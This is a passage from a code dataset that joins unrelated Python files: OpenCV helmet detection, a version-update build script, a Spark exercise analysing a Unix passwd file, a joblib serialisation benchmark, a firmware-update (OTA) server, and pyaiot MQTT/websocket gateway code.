net.getUnconnectedOutLayers()] # Draw the predicted bounding box def drawPred(classId, conf, left, top, right, bottom, frame): global frame_count # Draw a bounding box. #cv.rectangle(frame, (left, top), (right, bottom), (255, 178, 50), 3) label = '%.2f' % conf # Get the label for the class name and its confidence if classes: assert(classId < len(classes)) label = '%s:%s' % (classes[classId], label) #Display the label at the top of the bounding box labelSize, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1) top = max(top, labelSize[1]) #print(label) #testing #print(labelSize) #testing #print(baseLine) #testing label_name,label_conf = label.split(':') #spliting into class & confidance. will compare it with person. if label_name == 'Helmet': #will try to print of label have people.. or can put a counter to find the no of people occurance. #will try if it satisfy the condition otherwise, we won't print the boxes or leave it. #cv.rectangle(frame, (left, top - round(1.5*labelSize[1])), (left + round(1.5*labelSize[0]), top + baseLine), (255, 255, 255), cv.FILLED) #cv.putText(frame, label, (left, top), cv.FONT_HERSHEY_SIMPLEX, 0.75, (0,0,0), 1) frame_count+=1 #print(frame_count) if(frame_count> 0): return frame_count # Remove the bounding boxes with low confidence using non-maxima suppression def postprocess(frame, outs): frameHeight = frame.shape[0] frameWidth = frame.shape[1] global frame_count_out frame_count_out=0 classIds = [] confidences = [] boxes = [] # Scan through all the bounding boxes output from the network and keep only the # ones with high confidence scores. Assign the box's class label as the class with the highest score. classIds = [] #have to fins which class have hieghest confidence........=====>>><<<<======= confidences = [] boxes = [] for out in outs: for detection in out: scores = detection[5:] classId = np.argmax(scores) confidence = scores[classId] if confidence > confThreshold: center_x = int(detection[0] * frameWidth) center_y = int(detection[1] * frameHeight) width = int(detection[2] * frameWidth) height = int(detection[3] * frameHeight) left = int(center_x - width / 2) top = int(center_y - height / 2) classIds.append(classId) #print(classIds) confidences.append(float(confidence)) boxes.append([left, top, width, height]) # Perform non maximum suppression to eliminate redundant overlapping boxes with # lower confidences. indices = cv.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold) count_person=0 # for counting the classes in this loop. for i in indices: i = i[0] box = boxes[i] left = box[0] top = box[1] width = box[2] height = box[3] #this function in loop is calling drawPred so, try pushing one test counter in parameter , so it can calculate it. frame_count_out = drawPred(classIds[i], confidences[i], left, top, left + width, top + height, frame) #increase test counter till the loop end then print... #checking class, if it is a person or not my_class='Helmet' #======================================== mycode ..... unknown_class = classes[classId] if my_class == unknown_class: count_person += 1 #if(frame_count_out > 0): #print(frame_count_out) if count_person >= 1: path = 'test_out/' # frame_name=os.path.basename(fn) # trimm the path and give file name. #cv.imwrite(str(path)+frame_name, frame) # writing to folder. #print(type(frame)) #cv.imshow('img',frame) #cv.waitKey(800) return 1 else: return 0 #cv.imwrite(frame_name, frame) #======================================mycode......... # Process inputs winName = 'Deep learning object detection in OpenCV' cv.namedWindow(winName, cv.WINDOW_NORMAL) def detect(frame): #frame = cv.imread(fn) frame_count =0 # Create a 4D blob from a frame. blob = cv.dnn.blobFromImage(frame, 1/255, (inpWidth, inpHeight), [0,0,0], 1, crop=False) # Sets the input to the network net.setInput(blob) # Runs the forward pass to get output of the output layers outs = net.forward(getOutputsNames(net)) # Remove the bounding boxes with low confidence # Put efficiency information. The function getPerfProfile returns the overall time for inference(t) and the timings for each of the layers(in layersTimes) t, _ = net.getPerfProfile() #print(t) label = 'Inference time: %.2f ms' % (t * 1000.0 / cv.getTickFrequency()) #print(label) #cv.putText(frame, label, (0, 15), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255)) #print(label) k=postprocess(frame, outs) if k: return 1 else: return 0 ```
{ "source": "aaayushsingh/ios-runtime", "score": 3 }
#### File: build/scripts/update-version.py ```python import os import sys import json import get_version if len(sys.argv) < 2: print "Package.json location argument is missing" sys.exit(2) def getCommitSHA(): commitSHA = os.environ.get('GIT_COMMIT'); if commitSHA == None: return os.popen("git rev-parse HEAD").read().replace("\n", ""); def updatePackageVersion(): data = get_version.readPackageJSON(sys.argv[1]) data["version"] = get_version.getPackageVersion(data["version"]) commitSHA = getCommitSHA() if commitSHA: data["repository"]["url"] += "/commit/" + commitSHA with open(sys.argv[1], "w") as jsonFile: jsonFile.write(json.dumps(data, indent=2)) if __name__ == "__main__": updatePackageVersion() ```
{ "source": "AAB87/SparkExercises", "score": 3 }
#### File: SparkRDD/PasswordAnalysis/passwdAnalysis.py ```python import sys from pyspark import SparkConf, SparkContext def count_user_accounts(passwd_file) -> None: user_accounts = passwd_file \ .count() print("The number of user accounts is: %i \n" % user_accounts) def display_name_uid_gid_sorted_by_name(passwd_file_by_fields) -> None: users_by_name = passwd_file_by_fields \ .sortBy(lambda line: line[0]) \ .map(lambda line: [line[0], line[2], line[3]]) \ .take(5) for (user_name, user_UID, user_GID) in users_by_name: print("User name: %s, UID: %s, GID: %s" % (user_name, user_UID, user_GID)) def count_users_with_bash_command(passwd_file_by_fields) -> None: users_with_bash = passwd_file_by_fields \ .filter(lambda line: line[6] == "/bin/bash") \ .count() print("\nThe number of users having 'bash' as command when logging is: %i" % users_with_bash) def main(file_name: str) -> None: spark_conf = SparkConf() spark_context = SparkContext(conf=spark_conf) logger = spark_context._jvm.org.apache.log4j logger.LogManager.getLogger("org").setLevel(logger.Level.WARN) passwd_file = spark_context.textFile(sys.argv[1]) count_user_accounts(passwd_file) passwd_file_by_fields = passwd_file.map(lambda line: line.split(':')) display_name_uid_gid_sorted_by_name(passwd_file_by_fields) count_users_with_bash_command(passwd_file_by_fields) if __name__ == "__main__": """ Python program that uses Apache Spark to: 1) Count the number of users accounts in Unix passwd file 2) Show user name, UID and GID for the first alphabetical sorted accounts in Unix passwd file 3) Count the number of users having "bash" command when logging """ if len(sys.argv) != 2: print("Usage: spark-submit passwdAnalysis.py <file>", file=sys.stderr) exit(-1) main(sys.argv[1]) ```
{ "source": "aabadie/joblib", "score": 2 }
#### File: joblib/benchmarks/bench_pickle.py ```python import os import time import shutil import numpy as np import joblib import gc from joblib.disk import disk_used try: from memory_profiler import memory_usage except ImportError: memory_usage = None def clear_out(): """Clear output directory.""" if os.path.exists('out'): shutil.rmtree('out') os.mkdir('out') def kill_disk_cache(): """Clear disk cache to avoid side effects.""" if os.name == 'posix' and os.uname()[0] == 'Linux': try: os.system('sudo sh -c "sync; echo 3 > /proc/sys/vm/drop_caches"') except IOError as e: if e.errno == 13: print('Please run me as root') else: raise else: # Write ~100M to the disk open('tmp', 'wb').write(np.random.random(2e7)) def delete_obj(obj): """Force destruction of an object.""" if obj is not None: del obj gc.collect() def memory_used(func, *args, **kwargs): """Compute memory usage of func.""" if memory_usage is None: return np.NaN gc.collect() mem_use = memory_usage((func, args, kwargs), interval=.001) return max(mem_use) - min(mem_use) def timeit(func, *args, **kwargs): """Compute the mean execution time of func based on 7 measures.""" times = [] tries = kwargs['tries'] kwargs.pop('tries') if tries > 1: tries += 2 for _ in range(tries): kill_disk_cache() t0 = time.time() out = func(*args, **kwargs) if 1: # Just time the function t1 = time.time() times.append(t1 - t0) else: # Compute a hash of the output, to estimate the time # necessary to access the elements: this is a better # estimate of the time to load with me mmapping. joblib.hash(out) t1 = time.time() joblib.hash(out) t2 = time.time() times.append(t2 - t0 - 2 * (t2 - t1)) times.sort() return np.mean(times[1:-1]) if tries > 1 else t1 - t0, out def generate_rand_dict(size, with_arrays=False, with_string=False, array_shape=(10, 10)): """Generate dictionary with random values from list of keys.""" ret = {} rnd = np.random.RandomState(0) randoms = rnd.random_sample((size)) for key, random in zip(range(size), randoms): if with_arrays: ret[str(key)] = rnd.random_sample(array_shape) elif with_string: ret[str(key)] = str(random) else: ret[str(key)] = int(random) return ret def generate_rand_list(size, with_arrays=False, with_string=False, array_shape=(10, 10)): """Generate list with random values from list of keys.""" ret = [] rnd = np.random.RandomState(0) for random in rnd.random_sample((size)): if with_arrays: ret.append(rnd.random_sample(array_shape)) elif with_string: ret.append(str(random)) else: ret.append(int(random)) return ret def print_line(dataset, strategy, write_time, read_time, mem_write, mem_read, disk_used): """Nice printing function.""" print('% 15s, %12s, % 6.3f, % 7.4f, % 9.1f, % 9.1f, % 5.1f' % ( dataset, strategy, write_time, read_time, mem_write, mem_read, disk_used)) def print_bench_summary(args): """Nice bench summary function.""" summary = """Benchmark summary: - Global values: . Joblib version: {} . Number of tries to compute mean execution time: {} . Compression levels : {} . Compression algorithm: {} . Memory map mode : {} . Bench nifti data : {} . Bench big array : {} . Bench 2 big arrays : {} . Bench big dictionary: {} . Bench array+dict : {} """.format(joblib.__version__, args.tries, ", ".join(map(str, args.compress)), "None" if not args.compress else args.compressor, args.mmap, args.nifti, args.array, args.arrays, args.dict, args.combo) if args.array: shape = tuple(args.shape) size = round(np.multiply.reduce(shape) * 8 / 1024 ** 2, 1) summary += """ - Big array: . shape: {} . size in memory: {} MB """.format(str(shape), size) if args.dict: summary += """ - Big dictionary: . number of keys: {} . value type: {} """.format(args.size, 'np.ndarray' if args.valuearray else 'str' if args.valuestring else 'int') if args.valuearray: summary += """ . arrays shape: {} """.format(str(tuple(args.valuearrayshape))) if args.list: summary += """ - Big list: . number of elements: {} . value type: {} """.format(args.size, 'np.ndarray' if args.valuearray else 'str' if args.valuestring else 'int') if args.valuearray: summary += """ . arrays shape: {} """.format(str(tuple(args.valuearrayshape))) print(summary) def bench_compress(dataset, name='', compress=('zlib', 0), cache_size=0, tries=5): """Bench joblib dump and load functions, compress modes.""" # generate output compression strategy string before joblib compatibility # check as it may override the compress variable with a non tuple type. compress_str = "Raw" if compress[1] == 0 else "{} {}".format(*compress) # joblib versions prior to 0.10 doesn't support tuple in compress argument # so only the second element of the tuple is used for those versions # and the compression strategy is ignored. if (isinstance(compress, tuple) and tuple(map(int, joblib.__version__.split('.')[:2])) < (0, 10)): compress = compress[1] time_write = time_read = du = mem_read = mem_write = [] clear_out() time_write, obj = timeit(joblib.dump, dataset, 'out/test.pkl', tries=tries, compress=compress, cache_size=cache_size) del obj gc.collect() mem_write = memory_used(joblib.dump, dataset, 'out/test.pkl', compress=compress, cache_size=cache_size) delete_obj(dataset) du = disk_used('out') / 1024. time_read, obj = timeit(joblib.load, 'out/test.pkl', tries=tries) delete_obj(obj) mem_read = memory_used(joblib.load, 'out/test.pkl') print_line(name, compress_str, time_write, time_read, mem_write, mem_read, du) def bench_mmap(dataset, name='', cache_size=0, mmap_mode='r', tries=5): """Bench joblib dump and load functions, memmap modes.""" time_write = time_read = du = [] clear_out() time_write, _ = timeit(joblib.dump, dataset, 'out/test.pkl', tries=tries, cache_size=cache_size) mem_write = memory_used(joblib.dump, dataset, 'out/test.pkl', cache_size=cache_size) delete_obj(dataset) time_read, obj = timeit(joblib.load, 'out/test.pkl', tries=tries, mmap_mode=mmap_mode) delete_obj(obj) mem_read = memory_used(joblib.load, 'out/test.pkl', mmap_mode=mmap_mode) du = disk_used('out') / 1024. print_line(name, 'mmap %s' % mmap_mode, time_write, time_read, mem_write, mem_read, du) def run_bench(func, obj, name, **kwargs): """Run the benchmark function.""" func(obj, name, **kwargs) def run(args): """Run the full bench suite.""" if args.summary: print_bench_summary(args) if (not args.nifti and not args.array and not args.arrays and not args.dict and not args.list and not args.combo): print("Nothing to bench. Exiting") return compress_levels = args.compress compress_method = args.compressor mmap_mode = args.mmap container_size = args.size a1_shape = tuple(args.shape) a2_shape = (10000000, ) print('% 15s, %12s, % 6s, % 7s, % 9s, % 9s, % 5s' % ( 'Dataset', 'strategy', 'write', 'read', 'mem_write', 'mem_read', 'disk')) if args.nifti: # Nifti images try: import nibabel except ImportError: print("nibabel is not installed skipping nifti file benchmark.") else: def load_nii(filename): img = nibabel.load(filename) return img.get_data(), img.get_affine() for name, nifti_file in ( ('MNI', '/usr/share/fsl/data/atlases' '/MNI/MNI-prob-1mm.nii.gz'), ('Juelich', '/usr/share/fsl/data/atlases' '/Juelich/Juelich-prob-2mm.nii.gz'), ): for c_order in (True, False): name_d = '% 5s(%s)' % (name, 'C' if c_order else 'F') for compress_level in compress_levels: d = load_nii(nifti_file) if c_order: d = (np.ascontiguousarray(d[0]), d[1]) run_bench(bench_compress, d, name_d, compress=(compress_method, compress_level), tries=args.tries) del d if not args.nommap: d = load_nii(nifti_file) if c_order: d = (np.ascontiguousarray(d[0]), d[1]) run_bench(bench_mmap, d, name_d, mmap_mode=mmap_mode, tries=args.tries) del d # Generate random seed rnd = np.random.RandomState(0) if args.array: # numpy array name = '% 5s' % 'Big array' for compress_level in compress_levels: a1 = rnd.random_sample(a1_shape) run_bench(bench_compress, a1, name, compress=(compress_method, compress_level), tries=args.tries) del a1 if not args.nommap: a1 = rnd.random_sample(a1_shape) run_bench(bench_mmap, a1, name, mmap_mode=mmap_mode, tries=args.tries) del a1 if args.arrays: # Complex object with 2 big arrays name = '% 5s' % '2 big arrays' for compress_level in compress_levels: obj = [rnd.random_sample(a1_shape), rnd.random_sample(a2_shape)] run_bench(bench_compress, obj, name, compress=(compress_method, compress_level), tries=args.tries) del obj if not args.nommap: obj = [rnd.random_sample(a1_shape), rnd.random_sample(a2_shape)] run_bench(bench_mmap, obj, name, mmap_mode=mmap_mode, tries=args.tries) del obj if args.dict: # Big dictionary name = '% 5s' % 'Big dict' array_shape = tuple(args.valuearrayshape) for compress_level in compress_levels: big_dict = generate_rand_dict(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape) run_bench(bench_compress, big_dict, name, compress=(compress_method, compress_level), tries=args.tries) del big_dict if not args.nommap: big_dict = generate_rand_dict(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape) run_bench(bench_mmap, big_dict, name, mmap_mode=mmap_mode, tries=args.tries) del big_dict if args.list: # Big dictionary name = '% 5s' % 'Big list' array_shape = tuple(args.valuearrayshape) for compress_level in compress_levels: big_list = generate_rand_list(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape) run_bench(bench_compress, big_list, name, compress=(compress_method, compress_level), tries=args.tries) del big_list if not args.nommap: big_list = generate_rand_list(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape) run_bench(bench_mmap, big_list, name, mmap_mode=mmap_mode, tries=args.tries) del big_list if args.combo: # 2 big arrays with one big dict name = '% 5s' % 'Dict/arrays' array_shape = tuple(args.valuearrayshape) for compress in compress_levels: obj = [rnd.random_sample(a1_shape), generate_rand_dict(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape), rnd.random_sample(a2_shape)] run_bench(bench_compress, obj, name, compress=(compress_method, compress_level), tries=args.tries) del obj if not args.nommap: obj = [rnd.random_sample(a1_shape), generate_rand_dict(container_size, with_arrays=args.valuearray, with_string=args.valuestring, array_shape=array_shape), rnd.random_sample(a2_shape)] run_bench(bench_mmap, obj, name, mmap_mode=mmap_mode, tries=args.tries) del obj if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(description="Joblib benchmark script") parser.add_argument('--compress', nargs='+', type=int, default=(0, 3), help="List of compress levels.") parser.add_argument('--compressor', type=str, default='zlib', choices=['zlib', 'gzip', 'bz2', 'xz', 'lzma'], help="Compression algorithm.") parser.add_argument('--mmap', type=str, default='r', choices=['r', 'r+', 'w+'], help="Memory map mode.") parser.add_argument('--tries', type=int, default=5, help="Number of tries to compute execution time" "mean on.") parser.add_argument('--shape', nargs='+', type=int, default=(10000, 10000), help="Big array shape.") parser.add_argument("-m", "--nommap", action="store_true", help="Don't bench memmap") parser.add_argument('--size', type=int, default=10000, help="Big dictionary size.") parser.add_argument('--valuearray', action="store_true", help="Use numpy arrays type in containers " "(list, dict)") parser.add_argument('--valuearrayshape', nargs='+', type=int, default=(10, 10), help="Shape of arrays in big containers.") parser.add_argument('--valuestring', action="store_true", help="Use string type in containers (list, dict).") parser.add_argument("-n", "--nifti", action="store_true", help="Benchmark Nifti data") parser.add_argument("-a", "--array", action="store_true", help="Benchmark single big numpy array") parser.add_argument("-A", "--arrays", action="store_true", help="Benchmark list of big numpy arrays") parser.add_argument("-d", "--dict", action="store_true", help="Benchmark big dictionary.") parser.add_argument("-l", "--list", action="store_true", help="Benchmark big list.") parser.add_argument("-c", "--combo", action="store_true", help="Benchmark big dictionary + list of " "big numpy arrays.") parser.add_argument("-s", "--summary", action="store_true", help="Show bench summary.") run(parser.parse_args()) ```
{ "source": "aabadie/ota-server", "score": 2 }
#### File: ota-server/otaserver/server.py ```python import os import os.path import logging import json import datetime import asyncio from collections import defaultdict import tornado import tornado.platform.asyncio from tornado.options import options from tornado import web from aiocoap import GET from coap import CoapServer, coap_request, COAP_METHOD logger = logging.getLogger("otaserver") def _path_from_publish_id(publish_id): _path = publish_id.replace('/', '_').replace('\\', '_') return _path def _get_versions_from_path(path): files = os.listdir(path) versions = defaultdict(dict) for file in files: version = file.split('.')[-2] if version == 'latest': continue if version == 'riot': version = file.split('.')[-3] if 'riot.suit' in file: versions[version]['manifest'] = file if 'slot0' in file: versions[version]['slot0'] = file if 'slot1' in file: versions[version]['slot1'] = file return versions def _get_applications(path): applications = [] for d in os.listdir(path): board, name = d.split('_', 1) applications.append( { 'id': d, 'name': name, 'board': board, 'count':int((len(os.listdir(os.path.join(path, d))) - 1) / 3), 'versions': _get_versions_from_path(os.path.join(path, d)) }) return applications class OTAServerMainHandler(web.RequestHandler): """Web application handler for web page.""" def get(self): logger.debug("Rendering SUIT updates web page") applications = _get_applications(options.upload_path) self.render("otaserver.html", favicon=os.path.join("assets", "favicon.ico"), title="SUIT Update Server", applications=applications, host=options.http_host, port=options.http_port) class OTAServerRemoveHandler(tornado.web.RequestHandler): """Handler for removing an existing version.""" async def post(self): """Handle request for removing an existing version.""" request = json.loads(self.request.body.decode()) logger.debug("Removing version %s in application %s", request['version'], request['publish_id']) for publish_id in os.listdir(options.upload_path): if publish_id == request['publish_id']: for filename in os.listdir( os.path.join(options.upload_path, publish_id)): if str(request['version']) not in filename: continue logger.debug("Removing file %s", filename) file = os.path.join( options.upload_path, publish_id, filename) if os.path.exists(file): os.remove(file) class OTAServerCoapUrlHandler(web.RequestHandler): """Web application handler for getting the CoAP url.""" async def get(self): _coap_uri = 'coap://{}:{}'.format(options.coap_host, options.coap_port) _publish_id = self.request.path.split('/')[-1] _coap_url = '{}/{}'.format(_coap_uri, _publish_id) logger.debug("Sending CoAP server url: %s", _coap_url) self.write(_coap_url) class OTAServerNotifyHandler(tornado.web.RequestHandler): """Handler for notifying an update to a list of devices.""" async def post(self): """Handle notification of an available update.""" publish_id = self.request.body_arguments['publish_id'][0].decode() publish_path = _path_from_publish_id(publish_id) _store_path = os.path.join(self.application.upload_path, publish_id) base_filename = os.listdir(_store_path)[0].split('-')[0] slot0_manifest_url = os.path.join( publish_path, '{}-slot0.riot.suit.latest.bin'.format(base_filename)) slot1_manifest_url = os.path.join( publish_path, '{}-slot1.riot.suit.latest.bin'.format(base_filename)) devices_urls = self.request.body_arguments['urls'][0].decode() logger.debug('Notifying devices %s of an update of %s', devices_urls, publish_id) for url in devices_urls.split(','): logger.debug('Notifying an update to %s', url) inactive_url = '{}/suit/slot/inactive'.format(url) _, payload = await coap_request(inactive_url, method=GET) if int(payload) == 1: manifest_url = slot1_manifest_url else: manifest_url = slot0_manifest_url payload = '{}://{}:{}/{}'.format(COAP_METHOD, options.coap_host, options.coap_port, manifest_url) logger.debug('Manifest url is %s', payload) notify_url = '{}/suit/trigger'.format(url) logger.debug('Send update notification at %s', url) await coap_request(notify_url, payload=payload.encode()) class OTAServerNotifyv4Handler(tornado.web.RequestHandler): """Handler for notifying an update to a list of devices.""" async def post(self): """Handle notification of an available update.""" version = self.request.body_arguments['version'][0].decode() publish_id = self.request.body_arguments['publish_id'][0].decode() publish_path = _path_from_publish_id(publish_id) _store_path = os.path.join(self.application.upload_path, publish_id) base_filename = os.listdir(_store_path)[0].split('-')[0] manifest_url = os.path.join( publish_path, '{}-riot.suitv4_signed.{}.bin'.format(base_filename, version)) devices_urls = self.request.body_arguments['urls'][0].decode() logger.debug('Notifying devices %s of an update of %s', devices_urls, publish_id) for url in devices_urls.split(','): logger.debug('Notifying an update to %s', url) payload = '{}://{}:{}/{}'.format(COAP_METHOD, options.coap_host, options.coap_port, manifest_url) logger.debug('Manifest url is %s', payload) notify_url = '{}/suit/trigger'.format(url) logger.debug('Send update notification at %s', url) await coap_request(notify_url, payload=payload.encode()) class OTAServerPublishHandler(tornado.web.RequestHandler): """Handler for storing published firmwares.""" def _store(self, store_url, data): _store_path = os.path.join(self.application.upload_path, store_url) if not os.path.exists(_store_path): os.makedirs(_store_path) # Store each data in separate files for name, content in data.items(): _path = os.path.join(_store_path, name) logger.debug('Storing file %s', _path) with open(_path, 'wb') as f: f.write(content) # Hack to determine if the file is a manifest and copy as latest _path_split = _path.split('.') if 'suit' == _path_split[-3] or 'suitv4_signed' == _path_split[-3]: _path_split[-2] = 'latest' _path = '.'.join(_path_split) with open(_path, 'wb') as f: f.write(content) async def post(self): """Handle publication of an update.""" # Verify the request contains the required files files = self.request.files msg = None if len(files) == 0: msg = "No file found in request" if msg is not None: self.set_status(400, msg) self.finish(msg) return # Load the content of the files from the request update_data = {} for file in files: filename = os.path.basename(file) update_data[filename] = files[file][0]['body'] # Get publish identifier publish_id = self.request.body_arguments['publish_id'][0].decode() # Cleanup the path store_path = _path_from_publish_id(publish_id) logger.debug('Storing %s update', publish_id) # Store the data and create the corresponding CoAP resources self._store(store_path, update_data) if options.with_coap_server: self.application.coap_server.add_resources(store_path) class OTAServerApplication(web.Application): """Tornado based web application providing the OTA server.""" def __init__(self): if options.debug: logger.setLevel(logging.DEBUG) handlers = [ (r"/", OTAServerMainHandler), (r"/publish", OTAServerPublishHandler), (r"/remove", OTAServerRemoveHandler), (r"/notify", OTAServerNotifyHandler), (r"/notifyv4", OTAServerNotifyv4Handler), (r"/coap/url/.*", OTAServerCoapUrlHandler), ] settings = dict(debug=True, static_path=options.static_path, template_path=options.static_path,) self.upload_path = options.upload_path if options.with_coap_server: self.coap_server = CoapServer(self.upload_path, port=options.coap_port) super().__init__(handlers, **settings) logger.info('Application started, listening on port {}' .format(options.http_port)) ```
{ "source": "aabadie/pyaiot", "score": 2 }
#### File: pyaiot/common/messaging.py ```python import json import logging logger = logging.getLogger("pyaiot.messaging") class Message(): """Utility class for generating and parsing service messages.""" @staticmethod def serialize(message): return json.dumps(message, ensure_ascii=False) @staticmethod def new_node(uid, dst="all"): """Generate a text message indicating a new node.""" return Message.serialize({'type': 'new', 'uid': uid, 'dst': dst}) @staticmethod def out_node(uid): """Generate a text message indicating a node to remove.""" return Message.serialize({'type': 'out', 'uid': uid}) @staticmethod def update_node(uid, endpoint, data, dst="all"): """Generate a text message indicating a node update.""" return Message.serialize({'type': 'update', 'uid': uid, 'endpoint': endpoint, 'data': data, 'dst': dst}) @staticmethod def discover_node(): """Generate a text message for websocket node discovery.""" return Message.serialize({'request': 'discover'}) @staticmethod def check_message(raw): """Verify a received message is correctly formatted.""" reason = None try: message = json.loads(raw) except TypeError as e: logger.warning(e) reason = "Invalid message '{}'.".format(raw) message = None except json.JSONDecodeError: reason = ("Invalid message received " "'{}'. Only JSON format is supported.".format(raw)) message = None if message is not None: if not hasattr(message, '__iter__'): reason = "Invalid message '{}'.".format(message) elif 'type' not in message and 'data' not in message: reason = "Invalid message '{}'.".format(message) elif (message['type'] != 'new' and message['type'] != 'update' and message['type'] != 'out'): reason = "Invalid message type '{}'.".format(message['type']) if reason is not None: logger.warning(reason) message = None return message, reason ``` #### File: gateway/mqtt/mqtt.py ```python import time import uuid import json import asyncio import logging from tornado import gen from tornado.options import options from hbmqtt.client import MQTTClient, ClientException from hbmqtt.mqtt.constants import QOS_1 from pyaiot.common.messaging import Message as Msg logger = logging.getLogger("pyaiot.gw.mqtt") MQTT_HOST = 'localhost' MQTT_PORT = 1886 MAX_TIME = 120 class MQTTNode(object): """Object defining a MQTT node.""" def __init__(self, identifier, check_time=time.time(), resources=[]): self.node_id = identifier self.check_time = check_time self.resources = resources def __eq__(self, other): return self.node_id == other.node_id def __neq__(self, other): return self.node_id != other.node_id def __hash__(self): return hash(self.node_id) def __repr__(self): return("Node '{}', Last check: {}, Resources: {}" .format(self.node_id, self.check_time, self.resources)) class MQTTController(): """MQTT controller with MQTT client inside.""" def __init__(self, on_message_cb, port=MQTT_PORT, max_time=MAX_TIME): # on_message_cb = send_to_broker method in gateway application self._on_message_cb = on_message_cb self.port = port self.max_time = max_time self.nodes = {} self.mqtt_client = MQTTClient() asyncio.get_event_loop().create_task(self.start()) @asyncio.coroutine def start(self): """Connect to MQTT broker and subscribe to node check ressource.""" yield from self.mqtt_client.connect('mqtt://{}:{}' .format(options.mqtt_host, options.mqtt_port)) # Subscribe to 'gateway/check' with QOS=1 yield from self.mqtt_client.subscribe([('node/check', QOS_1)]) while True: try: logger.debug("Waiting for incoming MQTT messages from nodes") # Blocked here until a message is received message = yield from self.mqtt_client.deliver_message() except ClientException as ce: logger.error("Client exception: {}".format(ce)) break except Exception as exc: logger.error("General exception: {}".format(exc)) break packet = message.publish_packet topic_name = packet.variable_header.topic_name data = json.loads(packet.payload.data.decode('utf-8')) logger.debug("Received message from node: {} => {}" .format(topic_name, data)) if topic_name.endswith("/check"): asyncio.get_event_loop().create_task( self.handle_node_check(data)) elif topic_name.endswith("/resources"): asyncio.get_event_loop().create_task( self.handle_node_resources(topic_name, data)) else: self.handle_node_update(topic_name, data) def close(self): loop = asyncio.get_event_loop() loop.run_until_complete(self._disconnect()) @asyncio.coroutine def _disconnect(self): for node in self.nodes: yield from self._disconnect_from_node(node) yield from self.mqtt_client.disconnect() @asyncio.coroutine def handle_node_check(self, data): """Handle alive message received from coap node.""" node_id = data['id'] node = MQTTNode(node_id) node.check_time = time.time() if node not in self.nodes: resources_topic = 'node/{}/resources'.format(node_id) yield from self.mqtt_client.subscribe([(resources_topic, QOS_1)]) logger.debug("Subscribed to topic: {}".format(resources_topic)) node_uid = str(uuid.uuid4()) self.nodes.update({node: {'uid': node_uid, 'data': {'protocol': 'mqtt'}}}) logger.debug("Available nodes: {}".format(self.nodes)) self._on_message_cb(Msg.new_node(node_uid)) self._on_message_cb(Msg.update_node(node_uid, "protocol", 'mqtt')) discover_topic = 'gateway/{}/discover'.format(node_id) yield from self.mqtt_client.publish(discover_topic, b"resources", qos=QOS_1) logger.debug("Published '{}' to topic: {}".format("resources", discover_topic)) else: data = self.nodes.pop(node) self.nodes.update({node: data}) logger.debug("Available nodes: {}".format(self.nodes)) @asyncio.coroutine def handle_node_resources(self, topic, data): """Process resources published by a node.""" node_id = topic.split("/")[1] node = None for n in self.nodes.keys(): if n.node_id == node_id: node = n break if node is None: return node.resources = data yield from self.mqtt_client.subscribe( [('node/{}/{}'.format(node_id, resource), QOS_1) for resource in data]) yield from self.mqtt_client.publish('gateway/{}/discover' .format(node_id), b"values", qos=QOS_1) def handle_node_update(self, topic_name, data): """Handle CoAP post message sent from coap node.""" _, node_id, resource = topic_name.split("/") node = MQTTNode(node_id) value = data['value'] if node in self.nodes: if resource in self.nodes[node]['data']: # Add updated information to cache self.nodes[node]['data'][resource] = value else: self.nodes[node]['data'].update({resource: value}) # Send update to broker self._on_message_cb(Msg.update_node( self.nodes[node]['uid'], resource, value)) @gen.coroutine def fetch_nodes_cache(self, source): """Send cached nodes information.""" logger.debug("Fetching cached information of registered nodes '{}'." .format(self.nodes)) for _, value in self.nodes.items(): self._on_message_cb(Msg.new_node(value['uid'], dst=source)) for resource, data in value['data'].items(): self._on_message_cb( Msg.update_node(value['uid'], resource, data, dst=source)) def send_data_to_node(self, data): """Forward received message data to the destination node. The message should be JSON and contain 'uid', 'path' and 'payload' keys. - 'uid' corresponds to the node uid (uuid) - 'path' corresponds to the MQTT resource the node has subscribed to. - 'payload' corresponds to the new payload for the MQTT resource. """ uid = data['uid'] endpoint = data['endpoint'] payload = data['payload'] logger.debug("Translating message ('{}') received to MQTT publish " "request".format(data)) for node, value in self.nodes.items(): if self.nodes[node]['uid'] == uid: node_id = node.node_id logger.debug("Updating MQTT node '{}' resource '{}'" .format(node_id, endpoint)) asyncio.get_event_loop().create_task(self.mqtt_client.publish( 'gateway/{}/{}/set'.format(node_id, endpoint), payload.encode(), qos=QOS_1)) break def check_dead_nodes(self): """Check and remove nodes that are not alive anymore.""" to_remove = [node for node in self.nodes.keys() if int(time.time()) > node.check_time + self.max_time] for node in to_remove: asyncio.get_event_loop().create_task( self._disconnect_from_node(node)) for resource in node.resources: pass uid = self.nodes[node]['uid'] self.nodes.pop(node) logger.debug("Removing inactive node {}".format(uid)) logger.debug("Available nodes {}".format(self.nodes)) self._on_message_cb(Msg.out_node(uid)) @asyncio.coroutine def _disconnect_from_node(self, node): yield from self.mqtt_client.unsubscribe( ['node/{}/resource'.format(node.node_id)]) for resource in node.resources: yield from self.mqtt_client.unsubscribe( ['node/{}/{}'.format(node.node_id, resource)]) ``` #### File: utils/ws/ws_test_client.py ```python import sys import argparse import json import websocket from pyaiot.common.messaging import Message def init_node(ws): """Send initial node information""" ws.send(json.dumps({'type': 'update', 'data': {'node': 'fd00:aaaa:bbbb::1', 'name': 'websocket', 'led': '0', 'os': 'riot'}})) def main(args): """Main function.""" try: ws = websocket.create_connection("ws://{}:{}/node".format(args.host, args.port)) except ConnectionRefusedError: print("Cannot connect to ws://{}:{}".format(args.host, args.port)) return init_node(ws) while True: try: msg = ws.recv() except: print("Connection closed") break else: print(msg) if msg == Message.discover_node(): init_node(ws) else: msg = json.loads(msg) if msg['payload'] == '1': ws.send(json.dumps({'type': 'update', 'data': {'led': '1'}})) else: ws.send(json.dumps({'type': 'update', 'data': {'led': '0'}})) if __name__ == '__main__': parser = argparse.ArgumentParser(description="Test Websocket node") parser.add_argument('--host', type=str, default="localhost", help="Gateway host.") parser.add_argument('--port', type=str, default="8001", help="CoGateway port") args = parser.parse_args() try: 